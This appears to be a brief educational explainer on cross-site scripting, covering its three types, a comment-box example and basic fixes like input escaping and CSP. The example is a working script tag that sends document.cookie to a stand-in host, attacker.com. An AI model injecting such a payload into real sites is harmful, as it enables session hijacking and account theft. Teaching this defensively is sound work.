Jane Doe
Pro Plan
XSS (Cross-Site Scripting) is a web security vulnerability that allows an attacker to inject malicious scripts (usually JavaScript) into trusted websites. When a user loads the affected page, the malicious script runs in their browser, potentially stealing data or performing actions on their behalf.
The attacker tricks the site into delivering malicious code (not data) to the user's browser. That code can:
| Type | Description | Stored in DB? | Executes When? |
|---|---|---|---|
| Stored XSS | Malicious script is saved (e.g. in a comment or post) and shown to others. | ✅ Yes | When victim views it |
| Reflected XSS | Script is part of the URL or form input, immediately reflected in response. | ❌ No | When victim clicks a link |
| DOM-based XSS | The malicious code is injected via JavaScript that manipulates the page (DOM). | ❌ No | When JS on page executes it |
Imagine a comment box on a website. A user submits this:
<script> fetch("https://attacker.com/steal?cookie=" + document.cookie);</script>If the website doesn't sanitize or encode this input, the script will run in another user's browser — stealing their session cookie.
| Term | Meaning |
|---|---|
| XSS | Cross-Site Scripting — injecting malicious scripts into trusted websites |
| Goal | Execute code in another user's browser |
| Impact | Data theft, account hijack, defacement |
| Fix | Sanitize/escape input, use CSP, secure coding practices |